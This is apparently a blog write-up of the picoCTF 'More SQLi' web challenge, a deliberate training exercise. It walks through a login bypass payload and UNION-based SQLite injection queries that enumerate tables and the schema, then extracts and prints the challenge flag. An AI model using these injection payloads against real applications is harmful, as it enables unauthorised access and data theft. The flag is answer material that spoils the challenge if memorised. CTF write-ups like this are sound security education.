lifeofal3af@home:~$

About Me

My Ko-fi

Archive

RSS Archive

Picoctf More Sqli Challenge (medium) (web)

Hey there!

Today, I will be solving the More SQLi (Medium) Challenge

Initial Reconnaissance

When i put random characters in the username and password fields, the application spat out the following SQL query to give me some sort of hint:

SELECT id FROM users WHERE password = 'd' AND username = 'ADMIN'

Basic SQLi Exploit

Based on the revealed info, I made a simple SQL injection exploit for the password field:

' OR 1=1 --

Capture2

Which then led me to this page,

image

Screenshot of the page accessed after successful SQL injection

UNION-based Injection

Judging by that there are 3 columns I ran a UNION SELECT like so:

'UNION SELECT 1,2,3 --

This approach worked and showed me the following results: image

Database Identification

At first, I couldn’t figure out what Database the challenge was using so I decided to check out the hint that said “SQLiLite” which suggested that it was an SQLite installation.

SQLite Exploitation

With this information, I consulted the SQLite injection cheatsheet: SQLite Injection Cheatsheet

I then executed this command to retrieve the SQLite version:

'UNION SELECT 1,sqlite_version(),3 --

This query returned the SQLite version as shown here:

image

Figure 2: Screenshot showing the SQLite version

Table Enumeration

To enumerate the database tables, I used:

'UNION SELECT 1,(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),3 --

With this, I found a table named more_table, as the text at the beginning of the welcome page said so.

image

Figure 3: Screenshot showing the result of table enumeration

Table Structure

To examine the structure of more_table, I executed:

'UNION SELECT 1,(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='more_table'),3 --

This query provided us with the table’s schema.

image

Figure 4: Screenshot showing the structure of ‘more_table’

Flag Extraction

Finally, to extract the flag, I ran:

'UNION SELECT 1,(SELECT flag FROM more_table),3 --

This query successfully retrieved the flag:

picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_98236ce6}

image

Figure 5: Screenshot showing the extracted flag

Thanks for reading this writeup, see you later!